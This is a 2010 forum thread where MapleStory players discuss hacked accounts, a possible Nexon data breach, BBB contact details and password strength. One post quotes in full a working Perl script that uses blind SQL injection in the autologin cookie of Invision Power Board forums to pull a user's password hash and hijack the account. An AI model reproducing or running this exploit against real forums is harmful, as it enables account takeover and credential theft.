Southperry.net
Any recent hacked accounts from Southperry users? - Printable Version

+- Southperry.net (https://www.southperry.net)
+-- Forum: Maplestory (https://www.southperry.net/forumdisplay.php?fid=15)
+--- Forum: Maplestory Discussion (https://www.southperry.net/forumdisplay.php?fid=31)
+--- Thread: Any recent hacked accounts from Southperry users? (/showthread.php?tid=20977)



Any recent hacked accounts from Southperry users? - Fumni - 2010-01-24

Has anyone been using the BBB? Here is the link in case (*edit* thanks for correct link Dave)

Link to Nexon's BBB here.

Address:
137 North Larchmont Blvd.
Los Angeles, CA 90004
Tel: (213) 858-5930
Fax: (213) 858-5940


Any recent hacked accounts from Southperry users? - GameMX - 2010-01-24

Fumni Wrote:Has anyone been using the BBB? Here is the link in case (FYI: Kru Interactive=Nexon)

Link to Nexon's BBB page is here.

Kru Interactive (Nexon)
3350 Scott Blvd
Santa Clara, CA 95054
Tel: (408) 988-6770
Fax: (408) 988-7677
Contact: Andrew Guilding - Senior Game Director

This is Nexon.

http://www.la.bbb.org/Business-Report/Nexon-America-Inc-100061928

Address:
137 North Larchmont Blvd.
Los Angeles, CA 90004
Tel: (213) 858-5930
Fax: (213) 858-5940


Any recent hacked accounts from Southperry users? - Coogi - 2010-01-24

Typhoon Wrote:Not necessarily. Just because they have the info to accounts doesn't mean they know who's info belongs to who. I've said it like 5 times in this thread, if they have thousands of people's information, they have to just pick and choose and hope they get someone with money/equips or a lvl 200, hence some people's mules being hacked and not their mains. And one of my guildies was hacked yesterday, she uses NO forums and no websites such as MySpace or Facebook, and she rarely logs in.

Well, if I wanted to prove a point like they "tried" to do then I would have posted more then just some terrible accounts. I guess this is what happens when most maplers are so gullible. And I surely would have did more then a simple copy and paste, lol.

And I would surely wanna hack a Main over a mule when some people 10% with white scrolls on +7/9 some of them are worth max mesos them selves...I'd rather have something like that then a hole inventory full of ranom things worth a 100m here and there.

Though your friend may say that, there's tons of people say things like that but they did something that they wouldn't think would do something or just ignore the fact they could have done something to affect them. Not sayin you're friend is lieing, I'm just saying that some people do those kinds of things.

I actually believe there was a Data-Base hacking BEFORE those guys posted that...As I said before it would take a decent professional to hack a companys Data-Base with even personal information...And a professional wouldn't have done something like that imo.


Any recent hacked accounts from Southperry users? - Eos - 2010-01-24

GameMX Wrote:This is Nexon.

http://www.la.bbb.org/Business-Report/Nexon-America-Inc-100061928

Address:
137 North Larchmont Blvd.
Los Angeles, CA 90004
Tel: (213) 858-5930
Fax: (213) 858-5940

FYI, This is the correct one.


Any recent hacked accounts from Southperry users? - Takebacker - 2010-01-24

Molly Wrote:year-long item locks that should be FREE. (and cost NX to remove)

I kind of question why you stop there. Internal locking of items should have been a feature in the game from the start.


Any recent hacked accounts from Southperry users? - Fumni - 2010-01-24

GameMX Wrote:This is Nexon.

http://www.la.bbb.org/Business-Report/Nexon-America-Inc-100061928

Address:
137 North Larchmont Blvd.
Los Angeles, CA 90004
Tel: (213) 858-5930
Fax: (213) 858-5940

Weird, and when I searched for them on the BBB, there was a Nexon America that was listed as a private custodian company. Thanks for the correction, and lemme update the previous post so no one gets misdirected like I was.


Any recent hacked accounts from Southperry users? - Eos - 2010-01-24

Coogi Wrote:I actually believe there was a Data-Base hacking BEFORE those guys posted that...As I said before it would take a decent professional to hack a companys Data-Base with even personal information...And a professional wouldn't have done something like that imo.

It doesn't take a professional to take advantage of someone else's sloppy coding or shoddy security.
If a 14 year old can hack the whitehouse website hacking Nexon doesn't take any thing more than time and boredom.

As for your earlier comment about targeting 200s, the table that has accountid, accountname, password, pin and birth/registration dates doesn't include a list of characters or levels.
Since we don't know how they're getting info from that table, if they even are, we can't assume they have access to any other tables.


Any recent hacked accounts from Southperry users? - Coogi - 2010-01-24

Eosian Wrote:It doesn't take a professional to take advantage of someone else's sloppy coding or shoddy security.
If a 14 year old can hack the whitehouse website hacking Nexon doesn't take any thing more than time and boredom.

As for your earlier comment about targeting 200s, the table that has accountid, accountname, password, pin and birth/registration dates doesn't include a list of characters or levels.
Since we don't know how they're getting info from that table, if they even are, we can't assume they have access to any other tables.

But still, they did a very poor job at trying to prove anything...At least to me..Just seems like there would be more damage done for a data-base hack. for example I/anyone could simpley hack a forum ID and get there password and know there e-mail by a simple script like this:

Quote:use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent(”Mosiac 1.0″ . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = ”;}
if (!$ARGV[3]) {$ARGV[3] = ”;}
my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org (http://forums.site.org/) [id] [ver 1/2].\n\n”;
exit;
}
my @charset = (”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”Wink;
my $outputs = ”;
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ?
“99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*” :
“99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*”;
my @cookie = (’Cookie’ => $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = ”;
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print “$current\n”;
last;
}
}
if ( length($outputs) < 1 ) { print “Not Exploitable!\n”; exit; }
}
print “Cookie: ” . $cpre . “member_id=” . $user . “;” . $cpre . “pass_hash=” . $outputs;
exit;

A few mods to it and you can have a lot of info just from a forum account. I'll have to see if Nexon actually says anything about it to actually believe someone hacked the database.


Any recent hacked accounts from Southperry users? - Eos - 2010-01-24

Coogi Wrote:But still, they did a very poor job at trying to prove anything.

I've already said it's foolish to take professed hackers and scammers at their word for anything.
The only thing they were trying to "prove" is that you should fear them. Because they say so.


Any recent hacked accounts from Southperry users? - GameMX - 2010-01-24

Eosian Wrote:As for your earlier comment about targeting 200s, the table that has accountid, accountname, password, pin and birth/registration dates doesn't include a list of characters or levels.
Since we don't know how they're getting info from that table, if they even are, we can't assume they have access to any other tables.

Not really, if you log into the website, and go to the Info button, you can search what characters are on that account easily!


Any recent hacked accounts from Southperry users? - Eos - 2010-01-24

GameMX Wrote:Not really, if you log into the website, and go to the Info button, you can search what characters are on that account easily!

And how exactly does logging into every single account to look at who they have let them pick and choose which accounts to hijack before wasting the time logging into them?


Any recent hacked accounts from Southperry users? - Stereo - 2010-01-24

Interestingly the site doesn't seem to want to list my characters on any server where I have more than 3. It just reverts to the server it was previously at. All my accounts with 4+ chars have a character on multiple servers though so I don't know what the behaviour is when the only server available has too many.


Any recent hacked accounts from Southperry users? - Jellyflower - 2010-01-24

If they want to look through all the characters, it's probably easier to do it in game as there's an option on the login screen to show 'all characters' - levels, world, avatar, all the important status stuff which is an option I bet none of us even care about but in turn makes it easy easier for someone with unauthorized access to browse through victims' accounts with ease, ironically.

In regards to recent movement, I support the notion to creating more attention and awareness in hopes to put the investigation of the hacking issue to highest priority. Although going by the means of filing class lawsuit just seems too unorthodox to me. Maybe because there're no precedents pertaining this clause before, I don't know. I just want the process to be more 'civil' and I understand some of you may say 'we are being civil, yet Nexon is slowing silencing us", which I relate to by skimming the official forums. I guess I'm just saying I wish things don't have to come to this but a lot us do want answers and justice. If you ask me, "Well what can we do?" I seriously have no clue, "Sit down and wait and hope Nexon will do something?" Anyway, I'm not being helpful here, sorry.


Any recent hacked accounts from Southperry users? - LemonLimes - 2010-01-24

Nothing quite as funny as the typical dissenting Mapler.



Quote:[quote user="OMGitsJAKE"]

You guys are way too funny.

It so amazing that all kinds of experts have come out of the horizon and they will debate on theories and plots and schemes yet no one in any of these ridicules arguments presents any valid facts on these issues. First off prove to me Nexon database was hacked. It’s true that Nexon's Korean site is the mother of the Nexon Foundation. The company’s origin is brought into play many times. Hearing facts that they were hacked and there for so was Nexon America. Let me help you out a little and believe what you want. First off, Nexon America and Nexon Korean are 2 very different companies. And when it comes to revenue and profit, Nexon America makes tons more millions more.

This so called hack epidemic in Korea isn’t that new of an issue. It’s just new to all of you whom only played Maple Global. Hacking is so common and the use of Illegal NX someone getting into the low defense system is highly likely, and I might be uncertain about this. But I am pretty sure that The Korean laws on Hacking are a lot different so it would be much more difficult to prosecute people or even prevent general hacking.

The America Front has decent laws and a great team that puts a lot of hard work into the game. They are probably even paid better. These are the guys that make the profits for the entire company. I assure you there security vs. the Korean site is a lot better. Fact that there have only been claims about a breech and no evidence to prove it is very sad. What happened there isn’t the same as what happened here. I am not saying it can’t happen I am saying that since it happened in Korea is not proof because the companies are not the same.

Now stop whining about Spyware and key loggers cause for all of you so called computer pros. That’s not how they are doing it. What it appears using common sense as a deductable is that there was an information leek (not a Security breech)? The information was probably sold to a list of so called “hackers”. And they have been Password cracking ever since.

This is the facts here. They have your login IDs and your E-mails addresses. That means TECHNICALLY it’s YOUR responsibility. When you clicked play game you agreed to terms of use which state you’re responsible for all of your account related stuff. They have a list of Log in IDs and E-mails.

Now it’s true that if they did get you with spy ware they wouldn’t need to crack your password. Fortunately for all of you, these are not “Leet hackers” like you all assume. In fact to me it appears they have little to no knowledge at all about the true works of programming and software. Instead they have to crack your password and your pin. The pin is very simple to crack and doesn’t take long its only 4 digits. Not a lot to work with. Now here is my favorite part and the part where you all hate me. IF YOU GOT HACKED IT’S YOUR FAULT. All of this talks about how pro your security systems are what a joke and a laugh. If you truly believe they breeched Nexon what stops them from breeching you? And if you truly they can breech Nexon without leaving bread crumbs to follow. Think about it your home PC security? Suddenly isn’t so great. So no more of this “I did a scan” You know “Hackers” are always 1-2 weeks ahead of your spyware/virus protection? SO now we covered your security is crap. This is the part that's very important so listen up. This is INTERNET SAFTY 101. And it’s funny because no one mentions it really. TAKE A GOOD LOOK AT THAT CRAP YOU CALLED A PASSWORD!

A Password crack runs through every word in the dictionary and all kinds of frequently used number/symbol combinations. True some have made some that operate really fast but almost all of them are run the same way. And use the same bias to run. Basically if your password is truly as great as you say it is. Then you haven’t been breached. Do yourself a favor and request a password change from Nexon “playing you forgot” and see what THEY think a good password is. I bet you anything it’s a mixture of upper and lower case letters numbers and symbols in various random combinations. Their site warns you about it as does many others. I even did some testing with my many mule accounts and I made a password like MilkTheCow and it was hacked didn’t take long yet all of mine with Strong passwords.

Now before I finish I have one last thing I want to confront you all on. This “Their LEET hackers” business you always mention. First off an Elite Hacker is someone is who trained from years on the art of Breech security in a quiet fashionable manor. These are the kind of guys who get paid MILLIONS of dollars to break into governments (Plural more than one) security and retrieve important data. The amount of money you can possible make selling people equipment and NX wouldn’t ever value up to the amount they are paid for real jobs that require real skill. If these were Elite Hackers they would take over your screen disable the control of your keyboard and mouse and MAKE YOU WATCH them run-in your life. Drop all your stuff delete BL and destroy Guild. And about this “They do it for fun” Really? For fun huh? I am sure that’s what hackers do for fun or just because they can they hack into Nexon’s security get IDs and Not Passwords with them which they kind of need. And steel from working 20-30 and spoiled rotten teens 12-19? That’s how a hacker gets off? I have never met a “hacker” who does anything like that in fact. That sounds more like the sloppy work of a script kiddy. Making a big scene causing a ruckus yeah that’s smart “lets draw attention to yourselves” No hacker is dumb enough to pull these stunts, but sadly there are some of them who are dumb enough to sell the programs required to pull these stunts and a how to do guide.

Now I have one last request. If you were hacked and both your e-mail and Maple Passwords are 100% FOR SURE STRONG and you know for CERTENT you weren’t breeched in any way from any other site or outside interference. Then please Google. Microsoft’s Password Strength tester and type it in if it says ANYTHING but Strong or very strong. And you were still hacked? Please tell me what it “used” to be. Not current or don’t bother I refuse to be accused of anything, what it USED to be. If you have a spelled out word/name at ALL I will already tell you. “I don’t believe you.” I am not calling you a liar because I have no more evidence than you do. But I don’t believe you. Wither you like it or not you made a mistake down the road and you should be great full Nexon is even looking into it. TECHNICALLY they don’t have too. Btw I admit I don’t know how this list got out. Nor am I saying I know for fact they were not breeched. I am telling you all its HIGHLY unlikely

HAVE A NCIE DAY =D


Anyone care to wager when he'll be stripped clean and become the next Bobbort?


Any recent hacked accounts from Southperry users? - Duelman - 2010-01-24

Ok last night I had a thought. I wonder how many people were involved with tespia rounds using accounts that have now been attacked?

edit: oh and I would like to call it for next week? Let's say 7 days exactly... lol.


Any recent hacked accounts from Southperry users? - Eos - 2010-01-24

Duelman Wrote:I wonder how many people were involved with tespia rounds using accounts that have now been attacked?

My tespia account was different from my hacked account.


Any recent hacked accounts from Southperry users? - Duelman - 2010-01-24

hmm nevermind then, just trying to think outside of the box.


Any recent hacked accounts from Southperry users? - Fumni - 2010-01-24

Jellyflower Wrote:In regards to recent movement, I support the notion to creating more attention and awareness in hopes to put the investigation of the hacking issue to highest priority. Although going by the means of filing class lawsuit just seems too unorthodox to me. Maybe because there're no precedents pertaining this clause before, I don't know. I just want the process to be more 'civil' and I understand some of you may say 'we are being civil, yet Nexon is slowing silencing us", which I relate to by skimming the official forums. I guess I'm just saying I wish things don't have to come to this but a lot us do want answers and justice. If you ask me, "Well what can we do?" I seriously have no clue, "Sit down and wait and hope Nexon will do something?" Anyway, I'm not being helpful here, sorry.

You've been more than helpful by pushing to have this exposed for the real situation it is. I doubt it'll get to a class action lawsuit.

LemonLimes Wrote:Nothing quite as funny as the typical dissenting Mapler. Anyone care to wager when he'll be stripped clean and become the next Bobbort?

For clarification, that last poster is a loyalist, as he believes Nexon's word as the Gospel. We're the dissenters.

And yes, Bobbort has fallen. He even added to GameMX's Q & A hack data thread on Sleepywood, so I don't think he has a shred of doubt anymore. He needs to help persuade Nexon that this is a real situation, and to make an official notice so there aren't any more players like OMGitzJake blindly thinking their accounts are fine.


Any recent hacked accounts from Southperry users? - Stereo - 2010-01-24

Jellyflower Wrote:If they want to look through all the characters, it's probably easier to do it in game as there's an option on the login screen to show 'all characters' - levels, world, avatar, all the important status stuff which is an option I bet none of us even care about but in turn makes it easy easier for someone with unauthorized access to browse through victims' accounts with ease, ironically.

Fortunately for me (I guess, since it makes that thing useless) it can only list 15 characters. It chooses the servers in a random order and most of the time my main char doesn't even appear.

OMGitzJaKE Wrote:What it appears using common sense as a deductable is that there was an information leek (not a Security breech)? The information was probably sold to a list of so called “hackers”. And they have been Password cracking ever since.

This is the facts here. They have your login IDs and your E-mails addresses. That means TECHNICALLY it’s YOUR responsibility. When you clicked play game you agreed to terms of use which state you’re responsible for all of your account related stuff. They have a list of Log in IDs and E-mails.

It's my responsibility that Nexon sold hackers the 2 pieces of information necessary to hijack my account, neither of which can in fact be changed? I find that very hard to stomach.


Any recent hacked accounts from Southperry users? - LemonLimes - 2010-01-24

Number of hack reports on Nexon's forum seems to have grown at an alarming rate. Everything aside from hack discussion seems to be slowing being pushed off the front page.